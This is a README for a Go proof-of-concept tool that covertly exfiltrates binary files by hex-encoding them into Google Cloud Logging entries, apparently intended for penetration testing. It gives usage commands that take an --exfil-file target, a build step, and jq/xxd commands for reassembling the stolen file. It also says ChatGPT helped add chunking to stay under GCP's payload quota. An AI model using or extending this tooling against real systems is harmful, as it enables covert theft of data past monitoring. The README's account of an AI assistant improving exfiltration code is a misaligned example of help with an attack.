Proof of concept data exfil binary files to cloud logging via hex string Dennis Chow dchow[AT] March 26, 2023 No expressed or implied warranty or liability.
Need some help using the solution? Check out my accompanying article: Covert Data Exfil with GCP and Go
Revision 2: Pair programmed with ChatGPT v4 using the preview. Lots of enhancements including the 256KB quota limitation per payload entry in GCP. It also helped me add dynamic labeling each chunk as its uploaded and changing the logName so you're not confused when using multiple files and which order you need to reconstruct back on the jq and xxd side. My OLD mostly original code is under main.old and you can see main.rev1 as a intermediate area where ChatGPT started enhancing the code.
Dependencies and environment setup
go init gologexfil/main && go get
go run main.go --service-cred <YOUR-ACC-CRED.json> --project-id <YOUR-GCP-PROJECTID> --exfil-file <PATH/TO/>
Note: In pen testing do a go build first go build -o gologexfil ./main.go ensure you have already go get
Retrieve your file in GCP Cloud Logging either by console and dump to file e.g. cat dump.txt | xxd -r -p > somefile.ext
Alternatively use jq e.g.:
jq -r '.[] | {textPayload} | select(.textPayload != null) | .textPayload' ./downloaded-logs.json > payload-hexdump.text